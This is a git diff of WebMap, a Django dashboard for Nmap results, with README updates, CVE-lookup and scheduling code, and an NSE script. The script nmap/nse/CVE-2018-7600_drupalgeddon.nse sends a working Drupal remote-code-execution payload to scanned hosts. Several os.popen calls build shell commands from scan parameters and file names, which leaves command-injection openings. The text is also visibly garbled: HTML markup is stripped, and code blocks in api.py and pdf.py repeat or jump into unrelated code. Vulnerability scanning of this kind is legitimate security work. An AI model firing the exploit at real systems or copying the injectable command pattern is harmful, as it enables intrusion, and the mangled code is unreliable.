+[](https://www.youtube.com/watch?v=SoEIDNnOCGY) +
+Official Video of v2.1:
+[](https://www.youtube.com/watch?v=TujtG1Ki0TQ) + ## Features - Import and parse Nmap XML files +- Run and Schedule Nmap Scan from dashboard - Statistics and Charts on discovered services, ports, OS, etc... - Inspect a single host by clicking on its IP address - Attach labels on a host - Insert notes for a specific host - Create a PDF Report with charts, details, labels and notes - Copy to clipboard as Nikto, Curl or Telnet commands +- Search for CVE and Exploits based on CPE collected by Nmap +- RESTful API + +## Roadmap for v2.3x +You love WebMap and you know python? We need your help! This is what we want deploy for the v2.3: +- [todo] Improve template: try to define better the html template and charts +- [todo] Improve API: create a documentation/wiki about it +- [todo] Wiki: create WebMap User Guide on GitHub +- [todo] Authentication or something that could blocks access to WebMap if != localhost +- [working] Scan diff: show difference between two scheduled nmap scan report +- [todo] Zaproxy: Perform web scan using the OWASP ZAP API + +## Changes on v2.2 +- fixed bug on missing services +- Run nmap from WebMap +- Schedule nmap run +- Add custom NSE scripts section + +## Changes on v2.1 +- Better usage of Django template +- Fixed some Nmap XML parse problems +- Fixed CVE and Exploit collecting problems +- Add new Network View +- Add RESTful API + +## PDF Report + ## XML Filenames -When creating the PDF version of the Nmap XML Report, the XML filename is used as document title on the first page. WebMap will replace some parts of the filename as following: +When creating the PDF version of the Nmap XML Report, the XML filename is used as document title on the first page. +WebMap will replace some parts of the filename as following: - `_` will replaced by a space (` `) - `.xml` will be removed @@ -56,22 +119,173 @@ When creating the PDF version of the Nmap XML Report, the XML filename is used a Example: `ACME_Ltd..xml`
PDF title: `ACME Ltd.` +## CVE and Exploits +thanks to the amazing API services by circl.lu, WebMap is able to looking for CVE and Exploits for each CPE collected by Nmap. +Not all CPE are checked over the circl.lu API, but only when a specific version is specified +(for example: `cpe:/a:microsoft:iis:7.5` and not `cpe:/o:microsoft:windows`). + +## Network View + + +## RESTful API +From `v2.1` WebMap has a RESTful API frontend that makes users able to query their scan files with something like: + +```bash +curl -s 'http://localhost:8000/api/v1/scan' + + "webmap_version": "v2.1/master", + "scans": { + "scanme.nmap.org.xml": { + "filename": "scanme.nmap.org.xml", + "startstr": "Sun Nov 4 16:22:46 2018", + "nhost": "1", + "port_stats": { + "open": 42, + "closed": 0, + "filtered": 0 + } + }, + "hackthebox.xml": { + "filename": "hackthebox.xml", + "startstr": "Mon Oct 8 20:56:32 2018", + "nhost": "256", + "port_stats": { + "open": 67, + "closed": 0, + "filtered": 2 + } + } + } +} +``` + +A user can get information about a single scan by append to the URL the XML filename: + +```bash +curl -v 'http://localhost:8000/api/v1/scan/hackthebox.xml' + +{ + "file": "hackthebox.xml", + "hosts": { + "10.10.10.2": { + "hostname": {}, + "label": "", + "notes": "" + }, + "10.10.10.72": { + "hostname": { + "PTR": "streetfighterclub.htb" + }, + "label": "", + "notes": "" + }, + "10.10.10.76": { + "hostname": {}, + "label": "", + "notes": "" + }, + "10.10.10.77": { + "hostname": {}, + "label": "Vulnerable", + "notes": "PHNwYW4gY2xhc3M9ImxhYmVsIGdyZWVuIj5SRU1FRElBVElPTjwvc3Bhbj4gVXBncmFkZSB0byB0aGUgbGF0ZXN0IHZlcnNpb24g" + }, +... +``` + +and he can get all information about a single host by append the IP address to URL: + +```bash +curl -v 'http://localhost:8000/api/v1/scan/hackthebox.xml/10.10.10.87' + + "file": "hackthebox.xml", + "hosts": { + "10.10.10.87": { + "ports": [ + { + "port": "22", + "name": "ssh", + "state": "open", + "protocol": "tcp", + "reason": "syn-ack", + "product": "OpenSSH", + "version": "7.5", + "extrainfo": "protocol 2.0" + }, + { + "port": "80", + "name": "http", + "state": "open", + "protocol": "tcp", + "reason": "syn-ack", + "product": "nginx", + "version": "1.12.2", + "extrainfo": "" + }, + { + "port": "8888", + "name": "sun-answerbook", + "state": "filtered", + "protocol": "tcp", + "reason": "no-response", + "product": "", + "version": "", + "extrainfo": "" + } + ], + "hostname": {}, + "label": "Checked", + "notes": "", + "CVE": [ + { + "Modified": "2018-08-17T15:29:00.253000", + "Published": "2018-08-17T15:29:00.223000", + "cvss": "5.0", + "cwe": "CWE-200", + "exploit-db": [ + { + "description": "OpenSSH 7.7 - Username Enumeration. CVE-2018-15473. Remote exploit for Linux platform", + "file": "exploits/linux/remote/45233.py", + "id": "EDB-ID:45233", + "last seen": "2018-08-21", + "modified": "2018-08-21", + "platform": "linux", + "port": "", + "published": "2018-08-21", + "reporter": "Exploit-DB", + "source": "https://www.exploit-db.com/download/45233/", + "title": "OpenSSH 7.7 - Username Enumeration", + "type": "remote" + }, + { + "id": "EDB-ID:45210" + } + ], + "id": "CVE-2018-15473", + "last-modified": "2018-11-02T06:29:06.993000", + "metasploit": [ +... +``` + ## Third Parts - [Django](https://www.djangoproject.com) - [Materialize CSS](https://materializecss.com) - [Clipboard.js](https://clipboardjs.com) - [Chart.js](https://www.chartjs.org) - [Wkhtmltopdf](https://wkhtmltopdf.org) +- [API cve.circl.lu](https://cve.circl.lu) +- [vis.js](http://visjs.org/) ## Security Issues -This app is not intended to be exposed on the internet. Please, **DO NOT expose** this app to the internet, use your localhost or, in case you can't do it, take care to filter who and what can access to WebMap with a firewall rule or something like that. Exposing this app to the whole internet could lead not only to a stored XSS but also to a leakage of sensitive/critical/private informations about your port scan. Please, be smart. +This app is not intended to be exposed on the internet. Please, **DO NOT expose** this app to the internet, use your localhost or, +in case you can't do it, take care to filter who and what can access to WebMap with a firewall rule or something like that. +Exposing this app to the whole internet could lead not only to a stored XSS but also to a leakage of sensitive/critical/private +informations about your port scan. Please, be smart. ## Contributors -This project is currently a beta, and I'm not super skilled on Django so, every type of contribution is appreciated. I'll mention all contributors in this section of the README file. - -### Contributors List -- s3th_0x [@adubaldo](https://github.com/adubaldo) (bug on single host report) +This project is currently a beta, and I'm not super skilled on Django so, every type of contribution is appreciated. +I'll mention all contributors in this section of the README file. ## Contacts +In order to receive updates about this project, please follow me on twitter:
Twitter: [@Menin_TheMiddle](https://twitter.com/Menin_TheMiddle)
YouTube: [Rev3rseSecurity](https://www.youtube.com/rev3rsesecurity) diff --git a/api.py b/api.py index 2174ee5..2554268 100644 --- a/api.py +++ b/api.py @@ -1,7 +1,8 @@ from django.shortcuts import render from django.http import HttpResponse -import xmltodict, json, html, os, hashlib, re +import xmltodict, json, html, os, hashlib, re, requests, base64, urllib.parse from collections import OrderedDict +from nmapreport.functions import * def rmNotes(request, hashstr): scanfilemd5 = hashlib.md5(str(request.session['scanfile']).encode('utf-8')).hexdigest() @@ -103,3 +104,231 @@ def genPDF(request): os.popen('/opt/wkhtmltox/bin/wkhtmltopdf --cookie sessionid '+request.session._session_key+' --enable-javascript --javascript-delay 6000 http://127.0.0.1:8000/view/pdf/ /opt/nmapdashboard/nmapreport/static/'+pdffile+'.pdf') res = {'ok':'PDF created', 'file':'/static/'+pdffile+'.pdf'} return HttpResponse(json.dumps(res), content_type="application/json") + +def getCVE(request): + res = {} + + + if request.method == "POST": + scanfilemd5 = hashlib.md5(str(request.session['scanfile']).encode('utf-8')).hexdigest() + cveproc = os.popen('python3 /opt/nmapdashboard/nmapreport/nmap/cve.py '+request.session['scanfile']) + res['cveout'] = cveproc.read() + cveproc.close() + + return HttpResponse(json.dumps(res), content_type="application/json") + + #hostmd5 = hashlib.md5(str(request.POST['host']).encode('utf-8')).hexdigest() + #portmd5 = hashlib.md5(str(request.POST['port']).encode('utf-8')).hexdigest() + + # request.POST['host'] + + cpe = json.loads(base64.b64decode(urllib.parse.unquote(request.POST['cpe'])).decode('ascii')) + + for cpestr in cpe: + r = requests.get('http://cve.circl.lu/api/cvefor/'+cpestr) + cvejson = r.json() + + for host in cpe[cpestr]: + hostmd5 = hashlib.md5(str(host).encode('utf-8')).hexdigest() + if type(cvejson) is list and len(cvejson) > 0: + res[host] = cvejson[0] + f = open('/opt/notes/'+scanfilemd5+'_'+hostmd5+'.cve', 'w') + f.write(json.dumps(cvejson)) + f.close() + + return HttpResponse(json.dumps(res), content_type="application/json") + + r = requests.get('http://cve.circl.lu/api/cvefor/'+request.POST['cpe']) + + if request.POST['host'] not in res: + res[request.POST['host']] = {} + + cvejson = r.json() + + if type(cvejson) is list and len(cvejson) > 0: + res[request.POST['host']][request.POST['port']] = cvejson[0] + f = open('/opt/notes/'+scanfilemd5+'_'+hostmd5+'.cve', 'w') + f.write(json.dumps(cvejson)) + f.close() + + return HttpResponse(json.dumps(res), content_type="application/json") + +def apiv1_hostdetails(request, scanfile, faddress=""): + oo = xmltodict.parse(open('/opt/xml/'+scanfile, 'r').read()) + out2 = json.dumps(oo['nmaprun'], indent=4) + o = json.loads(out2) + + r = {'file':scanfile, 'hosts': {}} + scanmd5 = hashlib.md5(str(scanfile).encode('utf-8')).hexdigest() + + # collect all labels in labelhost dict + labelhost = {} + labelfiles = os.listdir('/opt/notes') + for lf in labelfiles: + m = re.match('^('+scanmd5+')_([a-z0-9]{32,32})\.host\.label$', lf) + if m is not None: + if m.group(1) not in labelhost: + labelhost[m.group(1)] = {} + labelhost[m.group(1)][m.group(2)] = open('/opt/notes/'+lf, 'r').read() + + # collect all notes in noteshost dict + noteshost = {} + notesfiles = os.listdir('/opt/notes') + for nf in notesfiles: + m = re.match('^('+scanmd5+')_([a-z0-9]{32,32})\.notes$', nf) + if m is not None: + if m.group(1) not in noteshost: + noteshost[m.group(1)] = {} + noteshost[m.group(1)][m.group(2)] = open('/opt/notes/'+nf, 'r').read() + + # collect all cve in cvehost dict + cvehost = get_cve(scanmd5) + + for ik in o['host']: + + # this fix single host report + if type(ik) is dict: + i = ik + else: + i = o['host'] + + hostname = {} + if 'hostnames' in i and type(i['hostnames']) is dict: + # hostname = json.dumps(i['hostnames']) + if 'hostname' in i['hostnames']: + # hostname += '
' + if type(i['hostnames']['hostname']) is list: + for hi in i['hostnames']['hostname']: + hostname[hi['@type']] = hi['@name'] + else: + hostname[i['hostnames']['hostname']['@type']] = i['hostnames']['hostname']['@name']; + + if i['status']['@state'] == 'up': + po,pc,pf = 0,0,0 + ss,pp,ost = {},{},{} + lastportid = 0 + + if '@addr' in i['address']: + address = i['address']['@addr'] + elif type(i['address']) is list: + for ai in i['address']: + if ai['@addrtype'] == 'ipv4': + address = ai['@addr'] + + if faddress != "" and faddress != address: + continue + + addressmd5 = hashlib.md5(str(address).encode('utf-8')).hexdigest() + #cpe[address] = {} + + labelout = '' + if scanmd5 in labelhost: + if addressmd5 in labelhost[scanmd5]: + labelout = labelhost[scanmd5][addressmd5] + + notesout,notesb64,removenotes = '','','' + if scanmd5 in noteshost: + if addressmd5 in noteshost[scanmd5]: + notesb64 = noteshost[scanmd5][addressmd5] + # notesout = '
contains notes' + # removenotes = '
' + if type(i['hostnames']['hostname']) is list: + for hi in i['hostnames']['hostname']: + hostname[hi['@type']] = hi['@name'] + else: + hostname[i['hostnames']['hostname']['@type']] = i['hostnames']['hostname']['@name']; + + if i['status']['@state'] == 'up': + po,pc,pf = 0,0,0 + ss,pp,ost = {},{},{} + lastportid = 0 + + if '@addr' in i['address']: + address = i['address']['@addr'] + elif type(i['address']) is list: + for ai in i['address']: + if ai['@addrtype'] == 'ipv4': + address = ai['@addr'] + + if faddress != "" and faddress != address: + continue + + addressmd5 = hashlib.md5(str(address).encode('utf-8')).hexdigest() + #cpe[address] = {} + + labelout = '' + if scanmd5 in labelhost: + if addressmd5 in labelhost[scanmd5]: + labelout = labelhost[scanmd5][addressmd5] + + notesout,notesb64,removenotes = '','','' + if scanmd5 in noteshost: + if addressmd5 in noteshost[scanmd5]: + notesb64 = noteshost[scanmd5][addressmd5] + # notesout = '
contains notes' + # removenotes = '
' + if type(i['hostnames']['hostname']) is list: + for hi in i['hostnames']['hostname']: + hostname += ''+hi['@type']+': '+hi['@name']+'
' + else: + hostname += ''+i['hostnames']['hostname']['@type']+': '+i['hostnames']['hostname']['@name']+'
' + + if i['status']['@state'] == 'up': + + po,pc,pf = 0,0,0 + #ss,pp,ost = {},{},{} + lastportid = 0 + + if '@addr' in i['address']: + address = i['address']['@addr'] + elif type(i['address']) is list: + for ai in i['address']: + if ai['@addrtype'] == 'ipv4': + address = ai['@addr'] + + addressmd5 = hashlib.md5(str(address).encode('utf-8')).hexdigest() + + if 'ports' in i and 'port' in i['ports']: + if len(i['ports']['port']) >= 1: + addnodes += " addNode('addr"+addressmd5+"', '"+address+"', '\uf0a0', '#090', '#999'); \n"+\ + " edges.add({ id: 'edge"+addressmd5+"', from: 'addr"+addressmd5+"', to: 'scan"+scanmd5+"', color:{color: '#cccccc'} }); \n" + + for pobj in i['ports']['port']: + if type(pobj) is dict: + p = pobj + else: + p = i['ports']['port'] + + if lastportid == p['@portid']: + continue + else: + lastportid = p['@portid'] + + if addressmd5 not in portnodes: + portnodes[addressmd5] = {} + + if p['@portid'] not in portnodes[addressmd5]: + portnodes[addressmd5][p['@portid']] = {} + + if p['state']['@state'] == 'closed': + portnodes[addressmd5][p['@portid']]['state'] = 'closed' + # addnodes += " addNode('port"+addressmd5+p['@portid']+"', '"+p['@portid']+"', '\uf057', '#f00', '#999'); "+\ + # " edges.add({ id: 'edgeport"+addressmd5+p['@portid']+"', from: 'addr"+addressmd5+"', to: 'port"+addressmd5+p['@portid']+"', color:{color: '#cccccc'} }); " + elif p['state']['@state'] == 'open': + portnodes[addressmd5][p['@portid']]['state'] = 'open' + # addnodes += " addNode('port"+addressmd5+p['@portid']+"', '"+p['@portid']+"', '\uf058', '#090', '#999'); "+\ + # " edges.add({ id: 'edgeport"+addressmd5+p['@portid']+"', from: 'addr"+addressmd5+"', to: 'port"+addressmd5+p['@portid']+"', color:{color: '#cccccc'} }); " + elif p['state']['@state'] == 'filtered': + portnodes[addressmd5][p['@portid']]['state'] = 'filtered' + # addnodes += " addNode('port"+addressmd5+p['@portid']+"', '"+p['@portid']+"', '\uf146', '#666', '#999'); "+\ + # " edges.add({ id: 'edgeport"+addressmd5+p['@portid']+"', from: 'addr"+addressmd5+"', to: 'port"+addressmd5+p['@portid']+"', color:{color: '#cccccc'} }); " + + v,z,e = '','','' + + if 'service' in p: + if '@version' in p['service']: + portnodes[addressmd5][p['@portid']]['version'] = p['service']['@version'] + else: + portnodes[addressmd5][p['@portid']]['version'] = 'No Version' + + if '@product' in p['service']: + portnodes[addressmd5][p['@portid']]['product'] = p['service']['@product'] + else: + portnodes[addressmd5][p['@portid']]['product'] = 'No Product' + + if '@extrainfo' in p['service']: + portnodes[addressmd5][p['@portid']]['extrainfo'] = p['service']['@extrainfo'] + else: + portnodes[addressmd5][p['@portid']]['extrainfo'] = '' + + # this fix single host report + if type(ik) is not dict: + break; + + + r['js'] = '' + + return render(request, 'nmapreport/nmap_network.html', r) diff --git a/nmap/cron.py b/nmap/cron.py new file mode 100644 index 0000000..b272a03 --- /dev/null +++ b/nmap/cron.py @@ -0,0 +1,39 @@ +from django.conf import settings +import os, re, json, time + +cdir = os.path.dirname(os.path.realpath(__file__)) + +schedfiles = os.listdir(cdir+'/schedule/') + +def gethours(f): + return { + '1h': 3600, + '1d': 86400, + '1w': 604800, + '1m': 2592000 + }[f] + +for i in schedfiles: + if re.search('^[a-f0-9]{32,32}\.json$', i.strip()) is not None: + sched = json.loads(open(cdir+'/schedule/'+i, "r").read()) + + nextrun = (sched['lastrun'] + gethours(sched['params']['frequency'])) + if nextrun <= time.time(): + sched['number'] = (sched['number']+1) + print("[RUN] scan:"+sched['params']['filename']+" id:"+str(sched['number'])+" (nextrun:"+str(nextrun)+" / now:"+str(time.time())+")") + + sched['lastrun'] = time.time() + + nmapout = os.popen('nmap '+sched['params']['params']+' --script='+cdir+'/nse/ -oX /tmp/'+str(sched['number'])+'_'+sched['params']['filename']+'.active '+sched['params']['target']+' > /dev/null 2>&1 && '+ + 'sleep 5 && mv /tmp/'+str(sched['number'])+'_'+sched['params']['filename']+'.active /opt/xml/webmapsched_'+str(sched['lastrun'])+'_'+sched['params']['filename']+' && '+ + 'ls -lart /opt/xml/webmapsched_'+str(sched['lastrun'])+'_'+sched['params']['filename']+' && python3 '+cdir+'/cve.py webmapsched_'+str(sched['lastrun'])+'_'+sched['params']['filename']+'').readlines() + + print(nmapout) + + f = open(cdir+'/schedule/'+i, "w") + f.write(json.dumps(sched, indent=4)) + + time.sleep(10) + else: + print("[SKIP] scan:"+sched['params']['filename']+" id:"+str(sched['number'])+" (nextrun:"+str(nextrun)+" / now:"+str(time.time())+")") + diff --git a/nmap/cve.py b/nmap/cve.py new file mode 100644 index 0000000..63ec45e --- /dev/null +++ b/nmap/cve.py @@ -0,0 +1,113 @@ +import xmltodict, json, html, os, hashlib, re, requests, base64, urllib.parse, sys + +def getcpe(xmlfile): + cpe,cve = {},{} + + oo = xmltodict.parse(open('/opt/xml/'+xmlfile, 'r').read()) + o = json.loads(json.dumps(oo['nmaprun'], indent=4)) + + for ik in o['host']: + + # this fix single host report + if type(ik) is dict: + i = ik + else: + i = o['host'] + + lastportid = 0 + + if '@addr' in i['address']: + address = i['address']['@addr'] + elif type(i['address']) is list: + for ai in i['address']: + if ai['@addrtype'] == 'ipv4': + address = ai['@addr'] + + addressmd5 = hashlib.md5(str(address).encode('utf-8')).hexdigest() + cpe[address] = {} + cve[address] = {} + + if 'ports' in i and 'port' in i['ports']: + for pobj in i['ports']['port']: + if type(pobj) is dict: + p = pobj + else: + p = i['ports']['port'] + + if lastportid == p['@portid']: + continue + else: + lastportid = p['@portid'] + + if 'service' in p: + if 'cpe' in p['service']: + if type(p['service']['cpe']) is list: + for cpei in p['service']['cpe']: + cpe[address][cpei] = cpei + else: + cpe[address][p['service']['cpe']] = p['service']['cpe'] + + if 'script' in p: + if type(p['script']) is list: + for scripti in p['script']: + if 'elem' in scripti: + if type(scripti['elem']) is list: + for elmi in scripti['elem']: + if elmi['@key'] == 'cve': + cve[address][elmi['#text']] = elmi['#text'] + + # this fix single host report + if type(ik) is not dict: + break; + + res = {'cpe':cpe,'cve':cve} + return res + +def getcve(xmlfile): + scanfilemd5 = hashlib.md5(str(xmlfile).encode('utf-8')).hexdigest() + cpecve = getcpe(xmlfile) + cvejson = {} + + for i in cpecve['cpe']: + print(i) + + if i not in cvejson: + cvejson[i] = [] + + for cpestr in cpecve['cpe'][i]: + print(cpestr) + if re.search('^cpe:[^:]+:[^:]+:[^:]+:.+$', cpestr): + r = requests.get('http://cve.circl.lu/api/cvefor/'+cpestr) + if r.json() is not None: + if r.json() is dict: + cvejson[i].append(r.json()) + else: + cvejson[i].append(r.json()) + + for i in cpecve['cve']: + print(i) + + if i not in cvejson: + cvejson[i] = [] + + for cvestr in cpecve['cve'][i]: + print(cvestr) + r = requests.get('http://cve.circl.lu/api/cve/'+cvestr) + if r.json() is not None: + if r.json() is dict: + cvejson[i].append(r.json()) + else: + cvejson[i].append([r.json()]) + + for i in cvejson: + hostmd5 = hashlib.md5(str(i).encode('utf-8')).hexdigest() + # for cvei in cvejson[i]: + #print(cvei) + #continue + + if type(cvejson[i]) is list and len(cvejson[i]) > 0: + f = open('/opt/notes/'+scanfilemd5+'_'+hostmd5+'.cve', 'w') + f.write(json.dumps(cvejson[i], indent=4)) + f.close() + +getcve(sys.argv[1]) diff --git a/nmap/nse/CVE-2018-7600_drupalgeddon.nse b/nmap/nse/CVE-2018-7600_drupalgeddon.nse new file mode 100644 index 0000000..d09cb3e --- /dev/null +++ b/nmap/nse/CVE-2018-7600_drupalgeddon.nse @@ -0,0 +1,60 @@ +local http = require "http" +local string = require "string" +local stdnse = require "stdnse" +local table = require "table" + +portrule = function(host, port) + return port.protocol == "tcp" and port.state == "open" +end + +action = function(host, port) + local out = stdnse.output_table() + out.cms = '' + out.isvulnerable = false + out.cmsversion = 'unknown' + + local response = http.get(host, port, '/README.txt') + if response.body ~= nil then + if ( string.find(response.body, "Drupal") ) then + out.cms = 'Drupal' + end + end + + if(response.header['x-generator'] ~= nil) then + if(string.find(response.header['x-generator'], "Drupal")) then + out.cms = 'Drupal' + end + end + + local response = http.get(host, port, '/core/install.php') + if response.body ~= nil then + if(string.find(response.body, "version")) then + local _,_,v = string.find(response.body, 'version..([0-9\\.]+)..span.') + out.cmsversion = v + end + end + + if(out.cms == 'Drupal') then + local opt = {} + local headers = {} + headers['content-type'] = 'application/x-www-form-urlencoded' + opt['content'] = 'form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=echo -n DRUPALVULNOK | md5sum' + opt['header'] = headers + local res = http.generic_request(host, port, 'POST', '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', opt) + + if(string.find(res.body, "65a5491770d940220151cf40fa070463")) then + out.vuln = "Drupal VULNERABLE to CVE-2018-7600" + out.isvulnerable = true + out.cve = "CVE-2018-7600" + else + out.vuln = "NOT VULNERABLE" + end + + table.insert(port.version.cpe, 'cpe:/a:drupal:drupal:'..out.cmsversion) + nmap.set_port_version(host, port) + end + + if out.cms ~= "" then + return out + end +end diff --git a/nmap/runcron.sh b/nmap/runcron.sh new file mode 100755 index 0000000..d35dcaa --- /dev/null +++ b/nmap/runcron.sh @@ -0,0 +1,7 @@ +#!/bin/bash + +while true; do + python3 /opt/nmapdashboard/nmapreport/nmap/cron.py && + echo "[SLEEP] for a while..." + sleep 10 +done diff --git a/nmap/schedule/.gitignore b/nmap/schedule/.gitignore new file mode 100644 index 0000000..d6b7ef3 --- /dev/null +++ b/nmap/schedule/.gitignore @@ -0,0 +1,2 @@ +* +!.gitignore diff --git a/pdf.py b/pdf.py index 738b7ea..e2a18a6 100644 --- a/pdf.py +++ b/pdf.py @@ -22,6 +22,11 @@ def reportPDFView(request): counters = {'po':0,'pc':0,'pf':0,'hostsup':0,'ostype':{},'pi':{},'ss':{}} scanmd5 = hashlib.md5(str(request.session['scanfile']).encode('utf-8')).hexdigest() + + # collect all cve in cvehost dict + cvehost = get_cve(scanmd5) + r['toc'] = '
Table of contents
'
+
for ik in o['host']:
# this fix single host report
@@ -68,6 +73,7 @@ def reportPDFView(request):
noteshost[m.group(1)][m.group(2)] = open('/opt/notes/'+nf, 'r').read()
if i['status']['@state'] == 'up':
+ r['toc'] += ''+saddress+'
Port scan
' labelout = '' if scanmd5 in labelhost: if addressmd5 in labelhost[scanmd5]: @@ -76,7 +82,7 @@ def reportPDFView(request): labelout = ''+html.escape(labelhost[scanmd5][addressmd5])+'' hostdetails_html += '
Port scan
' labelout = '' if scanmd5 in labelhost: if addressmd5 in labelhost[scanmd5]: @@ -76,7 +82,7 @@ def reportPDFView(request): labelout = ''+html.escape(labelhost[scanmd5][addressmd5])+'' hostdetails_html += '
'
- hostdetails_html += ' '+\
- ' '+p['@protocol']+' / '+p['@portid']+'
'+p['service']['@name']+' '+\
+ ' '+p['@protocol']+' / '+p['@portid']+'
'+servicename+' '+\
' '+hdhtml_stateico+' '+p['state']['@state']+' '+\
' '+hdhtml_product+' / '+hdhtml_version+' '+\
' '
@@ -179,11 +193,48 @@ def reportPDFView(request):
if addressmd5 in noteshost[scanmd5]:
notesb64 = noteshost[scanmd5][addressmd5]
notesout = '
' + + + cveout,cveout_html = '','' + if scanmd5 in cvehost: + if addressmd5 in cvehost[scanmd5]: + #for cveport in cvehost[scanmd5][addressmd5]: + cvejson = json.loads(cvehost[scanmd5][addressmd5]) + for ic in cvejson: + if type(ic) is list: + listcve = ic + elif type(ic) is dict: + listcve = [ic] + + for cveobj in listcve: + cverefout = '' + for cveref in cveobj['references']: + cverefout += ''+cveref+'
' + + cveexdbout = '' + if 'exploit-db' in cveobj: + cveexdbout = '
' + + cveout_html = ''+\
+ notesout+\
+ cveout_html
if portsfound is True:
# r['out'] += '1,'
@@ -221,12 +273,35 @@ def reportPDFView(request):
html_services += ''+str(ii)+' ('+str(counters['ss'][ii])+'), '
javascript_services += '["'+str(ii)+'", '+str(counters['ss'][ii])+'],'
+ scantitle = request.session['scanfile'].replace('.xml','').replace('_',' ')
+ if re.search('^webmapsched\_[0-9\.]+', request.session['scanfile']):
+ m = re.search('^webmapsched\_[0-9\.]+\_(.+)', request.session['scanfile'])
+ scantitle = m.group(1).replace('.xml','').replace('_',' ')
+
+ scantype = ''
+ if '@type' in o['scaninfo']:
+ scantype = o['scaninfo']['@type']
+
+ if type(o['scaninfo']) is list:
+ for sinfo in o['scaninfo']:
+ scantype += sinfo['@type']+', '
+ scantype = scantype[0:-2]
+
+ protocol = ''
+ if '@protocol' in o['scaninfo']:
+ protocol = o['scaninfo']['@protocol']
+
+ if type(o['scaninfo']) is list:
+ for sinfo in o['scaninfo']:
+ protocol += sinfo['@protocol']+', '
+ protocol = protocol[0:-2]
+
r['html'] += ''+\
'
'+\ + ' '+\ '
'+html.escape(saddress)+' '+labelout+'
' + hostdetails_html += ''+html.escape(saddress)+' '+labelout+'
' hostdetails_html += ' Status: '+html.escape(i['status']['@state'])+', ' hostdetails_html += 'Reason: '+html.escape(i['status']['@reason'])+', ' @@ -115,16 +121,17 @@ def reportPDFView(request): counters['pf'] = (counters['pf'] + 1) hostcounters['pf'] = (hostcounters['pf'] + 1) - if '@ostype' in p['service']: - if p['service']['@ostype'] in counters['ostype']: - counters['ostype'][p['service']['@ostype']] = (counters['ostype'][p['service']['@ostype']] +1) - else: - counters['ostype'][p['service']['@ostype']] = 1; + if 'service' in p: + if '@ostype' in p['service']: + if p['service']['@ostype'] in counters['ostype']: + counters['ostype'][p['service']['@ostype']] = (counters['ostype'][p['service']['@ostype']] +1) + else: + counters['ostype'][p['service']['@ostype']] = 1; - if p['service']['@name'] in counters['ss']: - counters['ss'][p['service']['@name']] = (counters['ss'][p['service']['@name']] + 1) - else: - counters['ss'][p['service']['@name']] = 1 + if p['service']['@name'] in counters['ss']: + counters['ss'][p['service']['@name']] = (counters['ss'][p['service']['@name']] + 1) + else: + counters['ss'][p['service']['@name']] = 1 if p['@portid'] in counters['pi']: counters['pi'][p['@portid']] = (counters['pi'][p['@portid']] + 1) @@ -132,25 +139,32 @@ def reportPDFView(request): counters['pi'][p['@portid']] = 1 hdhtml_product = '' - if '@product' in p['service']: - hdhtml_product = html.escape(p['service']['@product']) - else: - hdhtml_product = 'No Product' + if 'service' in p: + if '@product' in p['service']: + hdhtml_product = html.escape(p['service']['@product']) + else: + hdhtml_product = 'No Product' hdhtml_version = '' - if '@version' in p['service']: - hdhtml_version = html.escape(p['service']['@version']) - else: - hdhtml_version = 'No Version' + if 'service' in p: + if '@version' in p['service']: + hdhtml_version = html.escape(p['service']['@version']) + else: + hdhtml_version = 'No Version' hdhtml_protocolor = 'grey' if p['@protocol'] == 'tcp': hdhtml_protocolor = 'blue' elif p['@protocol'] == 'udp': hdhtml_protocolor = 'red' + + if 'service' in p: + servicename = p['service']['@name'] + else: + servicename = '' hostdetails_html_tr += ''+p['service']['@name']+'
'+servicename+'
'+\
- '
'
-
-
+ r['toc'] += ' NotesNotes for host '+saddress+'
'+\ + 'Notes for host '+saddress+'
'+\ ' '+base64.b64decode(urllib.parse.unquote(notesb64)).decode('ascii')+\ '' + + + cveout,cveout_html = '','' + if scanmd5 in cvehost: + if addressmd5 in cvehost[scanmd5]: + #for cveport in cvehost[scanmd5][addressmd5]: + cvejson = json.loads(cvehost[scanmd5][addressmd5]) + for ic in cvejson: + if type(ic) is list: + listcve = ic + elif type(ic) is dict: + listcve = [ic] + + for cveobj in listcve: + cverefout = '' + for cveref in cveobj['references']: + cverefout += ''+cveref+'
' + + cveexdbout = '' + if 'exploit-db' in cveobj: + cveexdbout = '
Exploit DB:
' + for cveexdb in cveobj['exploit-db']: + if 'title' in cveexdb: + cveexdbout += ''+html.escape(cveexdb['title'])+'
' + cveexdbout += '
'
+
+ cveout += '' + for cveexdb in cveobj['exploit-db']: + if 'title' in cveexdb: + cveexdbout += ''+html.escape(cveexdb['title'])+'
' + cveexdbout += '
'+\
+ ' '+html.escape(cveobj['id'])+' '+html.escape(cveobj['summary'])+'
'+\ + '
'
+
+ r['toc'] += ' CVE List'+\ + '
References:
'+cverefout+'
'+\
+ cveexdbout+\
+ ''+cverefout+'
' + + cveout_html = '
'+\
+ '
'
if i['status']['@state'] == 'up':
hostdetails_html += 'CVE List for '+saddress+':
'+\ + cveout+\ + ''+\
@@ -195,8 +246,9 @@ def reportPDFView(request):
'
'+\
- '| Protocol / Port | Port State | Product / Version |
|---|
'+portdetails_html_tr+'
'+\
- notesout
+ 'NSE Scripts for '+saddress+':
'+portdetails_html_tr+''+\
' 
'+\
'
'+\ + ' '+html.escape(scantitle)+'
'+\ ''+\
' '+\
'
'+\
'
'+\
' Port Scan Report
'+\ - ' '+html.escape(request.session['scanfile'].replace('.xml','').replace('_',' '))+''+\ + ' '+html.escape(scantitle)+'
'+\ '
| Arguments: | '+html.escape(o['@args'])+' |
| Scan started at: | '+html.escape(o['@startstr'])+' |
| Scan type: | '+html.escape(o['scaninfo']['@type'])+' |
| Scan type: | '+html.escape(scantype)+' |
| Nmap version: | '+html.escape(o['@version'])+' |
The information contained in these documents is confidential, privileged and only for the information of the intended recipient and may not be used, published or redistributed.
'+\
''+\ + ' '+\ '
'+\
'
Ports and Services
Ports status and services type
'+\
' '+\
@@ -334,7 +412,7 @@ def reportPDFView(request):
r['html'] += ''+\
'
'+\
'
'+\
- '
Generated with
